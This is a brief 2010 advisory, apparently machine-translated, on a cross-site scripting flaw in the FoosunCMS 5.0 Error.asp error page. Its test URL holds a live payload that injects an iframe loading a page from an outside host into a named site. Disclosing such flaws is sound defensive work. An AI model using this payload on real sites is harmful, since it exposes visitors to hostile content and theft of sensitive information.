Wind noise(FoosunCMS) 5.0 Error. asp error page cross-site scripting vulnerability (figure a-vulnerability warning-the black bar safety net

2010-03-20T00:00:00
ID MYHACK58:62201026485
Type myhack58
Reporter 佚名
Modified 2010-03-20T00:00:00

Description

FoosunCMS is a powerful feature of based on ASP+ACCESS/MSSQL architecture of content management software, the leading domestic the first open source, integrated web2. 0 elements, modular CMS built Station system. FoosunCMS incorrectly filtered user input, a remote attacker could exploit the vulnerability to conduct cross-site scripting attacks, obtain sensitive information. Due to incorrect error handling page, in return to the user, can result in malicious script code in the target browser on the implementation, the leakage of sensitive information.

Test Url

http://www.freecms2008.cn/Foosun500/User/lib/Error.asp?ErrCodes=%3Ciframe%20src=http://dgyifeng.net/swf/qing.html%3E&ErrorUrl=http://www. freecms2008. cn/foosun500/

!